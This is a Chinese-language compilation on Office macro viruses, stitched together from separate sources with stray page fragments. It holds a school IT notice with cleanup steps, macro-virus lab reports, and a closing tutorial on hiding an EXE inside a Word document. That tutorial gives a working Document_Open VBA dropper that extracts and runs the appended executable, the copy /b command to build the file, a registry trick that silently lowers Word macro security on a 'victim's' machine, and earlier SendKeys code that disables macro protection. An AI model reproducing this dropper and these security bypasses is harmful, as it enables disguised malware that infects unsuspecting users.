下载文档原格式
关于Office文档中宏病毒的处理方法
Office文档是目前使用最多、最常见的办公文档(它包含Word文档,Excel文档,PPT文档等),由于Office 软件默认的安全级别为中,所以Office文档成了病毒攻击的目标,目前有许多Office文档病毒,最近校园网出现的宏病毒传播,成了大家头疼的一件事,现就处理方法介绍如下,请各老师参考与分享。
1.宏病毒的分析
Office文档中的宏是Office中最高级别的部分,平时大家很少用到,它能把繁重的工作简单化,默认的安全级别为中,宏病毒正是利用这一点通过网络、U盘等进行传播,中毒的电脑明显反应变慢,Office文档大小在不断变化,有的成倍增加,一个小小的电子表格就有2M之多,使用十分困难。
2.感染后的特征
感染后的Office文档,除大小变大外,每次打开都要求启用宏,不启用便不能打开Office文档,或者打开了,全是空白,如果使用杀毒软件,则会把文档删除,给用户带来许多麻烦。
Office软件运行缓慢,电脑经常死机等。
由于现在(QQ、126)邮件系统都集成防毒软件,在发送邮件时上传感染后的Office文档,邮件系统会提示文件发送失败。
3.处理方法
方法一:
点击下载“Office病毒专杀.zip”工具,解压后安装,界面如下:
点击全盘杀毒,即可对电脑中的Office病毒进行全面查杀。
方法二:点击下载安装“新版360杀毒软件.rar”,启动新增Office宏病毒免疫功能。
关于财务部excel宏病毒(XF/Sic.gen)清除方法
请注意财务部门最近传递文件提示有病毒!目前电脑装有杀毒能清除病毒主体,但残余病毒体会重新激活病毒!
具体清除方法如下:
第一步:A、打开文件(如果能打开的话,有些防毒软件会直接杀掉) 选择菜单[插入] ----[名称] ----[定义],如下图:
B、在打开的对话框中,会发现有如下图中所示居多“定义名称”。
此处就是病毒清理不完的根源!将里面内容全部删除。
C、正常情况如下图(若没有进行“定义名称”设定的情况下)
第二步:打开[我的电脑]的如下位置:
C:\Program Files\Microsoft Office\OFFICE11\XLSTART 删除里面的所有内容。
进行完以上步骤后,若excel程序提示其它异常的话,可以关闭程式重新运行即可。
提示:在进行此操作前请先将文件进行备份!。
---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求:通过本实验的学习,大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。
二、实验基本原理:宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。
宏病毒的前缀是:Macro,第二前缀是:Word、 Word97、 Excel、 Excel97(也许还有别的)其中之一。
凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀,格式是:Macro. Word97;凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀,格式是:Macro. Word;凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀,格式是:Macro. Excel97;凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀,格式是:Macro. Excel,依此类推。
该类病毒的公有特性是能感染 OFFICE系列文档,然后通过OFFICE 通用模板进行传播,如:1 / 5著名的美丽莎(Macro. Melissa) 。
一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材:PC 电脑一台四、实验内容或步骤:---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1.启动 Word,创建一个新文档。
宏病毒原理及案例分析屈立成4114005088什么是宏?所谓宏,就是一些命令组织在一起,作为一个单独命令完成一个特定任务。
Microsoft Word中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。
Word使用宏语言Word_Basic将宏作为一系列指令来编写。
Word宏病毒是一些制作病毒的专业人员利用Microsoft Word的开放性即word中提供的Word BASIC编程接口,专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机的使用,并能通过.DOC文档及.DOT 模板进行自我复制及传播。
宏可使任务自动化,如果在Word中重复进行某项工作,可用宏使其自动执行。
宏是将一系列的Word命令和指令结合在一起,形成一个命令,以实现任务执行的自动化。
用户可创建并执行一个宏,以替代人工进行一系列费时而重复的Word操作。
事实上,它是一个自定义命令,用来完成所需任务。
宏的一些典型应用如:加速日常编辑和格式设置、组合多个命令、使对话框中的选项更易于访问、使一系列复杂的任务自动执行等。
Word 提供了两种创建宏的方法:宏录制器和Visual Basic 编辑器。
宏录制器可帮助用户开始创建宏。
Word 在VBA 编程语言中把宏录制为一系列的Word 命令。
可在Visual Basic 编辑器中打开已录制的宏,修改其中的指令。
也可用Visual Basic 编辑器创建包括Visual Basic 指令的非常灵活和强有力的宏,这些指令无法采用录制的方式。
VBAVisual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化任务的编程语言。
主要能用来扩展Windows的应用程式功能,特别是Microsoft Office软件。
也可说是一种应用程式视觉化的Basic 脚本。
Word宏病毒实验应用场景计算机病毒是一个程序,一段可执行码,对计算机的正常使用进行破坏,使得电脑无法正常使用甚至整个操作系统或者电脑硬盘损坏。
就像生物病毒一样,计算机病毒有独特的复制能力。
计算机病毒可以很快地蔓延,又常常难以根除。
它们能把自身附着在各种类型的文件上。
当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
这种程序不是独立存在的,它隐蔽在其他可执行的程序之中,既有破坏性,又有传染性和潜伏性。
轻则影响机器运行速度,使机器不能正常运行;重则使机器处于瘫痪,会给用户带来不可估量的损失。
通常就把这种具有破坏作用的程序称为计算机病毒。
除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。
当你看到病毒载体似乎仅仅表现在文字和图像上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。
若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。
病毒往往会利用计算机操作系统的弱点进行传播,提高系统的安全性是防病毒的一个重要方面,但完美的系统是不存在的,过于强调提高系统的安全性将使系统多数时间用于病毒检查,系统失去了可用性、实用性和易用性,另一方面,信息保密的要求让人们在泄密和抓住病毒之间无法选择。
病毒与反病毒将作为一种技术对抗长期存在,两种技术都将随计算机技术的发展而得到长期的发展。
宏病毒是使用宏语言(VBA)编写的恶意程序,存在于字处理文档、电子数据表格、数据库等数据文件中,例如office 数据处理系统中运行,利用宏语言的功能将自己复制、繁殖到其他数据文档中。
宏分成两种:一种是在某个文档中包含的内嵌宏,如fileopen 宏;另一种是属于word 应用程序,所有打开文档公用的宏,如autoopen 宏。
Word 宏病毒一般都首先隐藏在一个指定的word 文档中,一旦打开了这个word 文档,宏病毒就被执行,宏病毒要做的第一件事情就是将自己copy 到全局宏的荡然区域,使得所有打开的文档都可以使用这个宏。
XI`AN TECHNOLOGICAL UNIVERSITY 实验报告一.实验目的1.理解WORD宏病毒的感染方式2.理解WORD宏病毒的工作原理3.掌握WORD宏病毒的杀毒方法二.实验原理WORD的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录)等。
模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像和格式编排都是类似的。
WORD提供了几种常见文档类型的模板,如备忘录、报告和商务信件。
你可以直接使用模板来创建新文档,或者加以修改,也可以创建自己的模板。
一般情况下,WORD自动将新文档基于缺省的公用模板NORMAL.DOT。
由此可以看出,模板在建立整个文档中起的作用是作为基类,文档继承模板的属性,包括宏、菜单、格式等。
另外,WORD还提供强大的宏功能。
宏是能组织到一起作为一个独立命令使用的一系列WORD命令,它能使日常工作变得更容易。
在WORD启动时,会自动加载NORMAL.DOT模板,以及它们所包含的宏。
您可以为宏指定特殊的名称,使其变为自动宏,以便在执行某一操作时,如:启动WORD或打开文档,就自动执行具有特殊命名的宏。
同其他宏一样,你可以将自动宏定义在一个共用模板上,也可以将其定义在一个特定模板上。
宏病毒主要寄生在以下3个宏中:AUTOOPEN、AUTONEW、AUTOCLOSE。
带病毒文档打开时,将病毒传染给NORMAL.DOT公用模板中,再由公用模板传染给所有其它正常的文档。
二.MOTHERSDAYVIRUS病毒感染机制MOTHERSDAYVIRUS宏病毒感染WORD文档和NORMAL.DOT文档。
被感染的WORD文档打开时或关闭时会首先弹出一个对话框,对话框关闭后再将控制权转移给正常的WORD文档执行。
MOTHERSDAYVIRUS使用DOCUMENT_OPEN宏(文档打开时执行)感染NORMAL.DOT,使用AUTOCLOSE自动宏感染其它文档。
宏病毒实验报告一、实验目的本次实验旨在深入了解宏病毒的工作原理、传播方式以及其对计算机系统可能造成的危害,并通过实际操作和观察,探索有效的防范和清除策略。
二、实验环境1、操作系统:Windows 10 专业版2、办公软件:Microsoft Office 20193、杀毒软件:_____杀毒软件三、实验原理宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
当打开包含宏病毒的文档时,宏病毒会被自动激活,并执行其中的恶意代码。
宏病毒通常利用 Office 软件中的宏功能来实现自我复制、传播和破坏操作。
四、实验步骤1、准备带有宏病毒的测试文档从网络上获取已知的含有宏病毒的示例文档。
对获取的文档进行备份,以防对实验环境造成不可恢复的破坏。
2、观察宏病毒的激活过程打开带有宏病毒的文档。
留意弹出的警告提示,记录相关信息。
3、分析宏病毒的行为观察文档中的内容是否被篡改。
检查计算机系统的性能是否受到影响,如 CPU 使用率、内存占用等。
4、尝试清除宏病毒使用安装的杀毒软件进行扫描和清除。
手动删除相关的宏代码。
五、实验结果与分析1、宏病毒激活情况打开测试文档时,Office 软件弹出了宏安全警告,但仍可以选择启用宏。
一旦启用宏,病毒立即开始执行恶意操作。
2、宏病毒的行为表现文档中的部分文本被修改,格式变得混乱。
CPU 使用率短时间内飙升,系统运行变得卡顿。
3、清除效果杀毒软件能够检测到宏病毒,并成功清除大部分感染,但仍有部分残留。
手动删除宏代码后,文档恢复正常,系统性能也逐渐恢复。
六、实验结论1、宏病毒具有较强的隐蔽性和破坏性,能够在用户不知情的情况下对文档和系统造成损害。
2、办公软件的宏安全设置对于防范宏病毒至关重要,用户应保持较高的安全意识,不轻易启用来源不明的宏。
3、杀毒软件在宏病毒的清除方面起到了一定的作用,但仍需不断更新病毒库和优化清除算法,以应对不断变化的宏病毒威胁。
4、定期备份重要的文档和数据是防范宏病毒造成严重损失的有效措施。
-- Word宏病毒制作,传播,防范
EXE变DOC的方法
其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc
文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在
运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就
造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!)
熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒
就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数:
1)createfile 用于打开文件,该函数vb的声明如下:
declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string,
byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributes
as long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long
2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下:
declare function closehandle lib "kernel32" (byval hobject as long) as long
3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下:
declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoread
as long, lpnumberofbytesread as long, byval lpoverlapped as long) as long
4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下:
declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowrite
as long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long
5)setfileponiter移动文件指针,该函数vb的声明如下:
declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval
lpdistancetomovehigh as long, byval dwmovemethod as long) as long
6)下面是以上函数的参数声明
public const generic_read as long = &h80000000
public const generic_write as long = &h40000000
public const file_share_read as long = 1
public const file_share_write as long = 2
public const create_new as long = 1
public const create_always as long = 2
public const open_existing as long = 3
public const open_always as long = 4
public const truncate_existing as long = 5
public const invalid_handle_value as long = -1
public const file_attribute_normal as long = &h80
好了,有了这些准备工作就可以开始了,我们运行word2000,打开visual basic编辑器,新建一个模块,把上面的函数
和参数声明拷进去!再回到“thisdocument.的代码视图,选择document.nbspopen的事件,输入一下代码:
private sub document.open()
dim buffer(65536) as byte
dim h, h2, j, i, k as long
h = createfile(thisdocument.path & "/" & thisdocument.name, generic_read, file_share_read + file_share_write, 0, open_existing, 0, 0)
‘以share_read的方式打开自身的doc文件
h2 = createfile("c:\\autoexec.exe", generic_write, 0, 0, create_always, 0, 0)
‘新建一个exe文件准备存放读取出来的数据.
if h = invalid_handle_value then
exit sub
end if
k = setfilepointer(h, 32768, nil, 0)
‘把文件指针移动到doc文件与exe文件交界处.
do
i = readfile(h, buffer(0), 65536, j, 0)
i = writefile(h2, buffer(0), j, j, 0)
loop until j < 65536
closehandle (h)
closehandle (h2)
shell "c:\\autoexec.exe"
‘运行exe文件
end sub
这样宏就编写好了,注意的地方就是上面setfilepointer函数的使用部分:32768是你编写完宏保存
好的doc文件的文件大小,不一顶就是32768哦,大家注意!
大家可能有疑问,如何把exe文件接到doc文件后面呢?很简单,把你要接的exe放到和
这个doc文件同一个目录下.运行doc命令:
copy /b xxxx.doc + xxxxx.exe newdoc.doc
这样就可以了~~~.当你打开这个newdoc.doc的时候,宏就会把后面的exe文件读出来并保存
在c:\\autoexec.exe中,然后运行,是不是很恐怖啊!不过这需要你的word2000安全度为最低的时候
才能实现,关于这个安全度的问题,我们又发现了微软的小bug,大家看看注册表中这个键: hkey_current_user\\software\\microsoft\\office\\9.0\\word\\security 中的
level值.当安全度是3(高)的时候,word不会运行任何的宏,2(中)的时候word会询问你是否运行宏,1(低)的时候
word就会自动运行所有的宏!但很容易就被发现安全度被设为低了,聪明的你一定想到如果这个值
变为0的时候会怎么样!!??对了!如果设为0的话,word里面就会显示安全度为高,但却能自动运行任何
的宏!!是不是很夸张??和注册表编辑器的后门一样这都是ms的后门吧?
如果要受害人的机器接受你的doc文件又能顺利运行,最重要就是把word的安全度在注册表中的
值改为0,怎么改??方法太多了吧,单是ie的恶意代码能实现的都太多了,另外,如果网页上连接上是doc的
话,ie也会自动下载该doc文件!危险的ms啊!!
这个算不算漏洞我不敢说,但防范真的很难,除非一天到晚监视着注册表,或者不用word?太消极了
吧,最重要的是小心防范,陌生人的东西千万不要收!包括非exe文件,我们现在发现了doc文件能
隐藏exe文件,也会有人发现其他文件能隐藏exe,所以大家千万要小心。
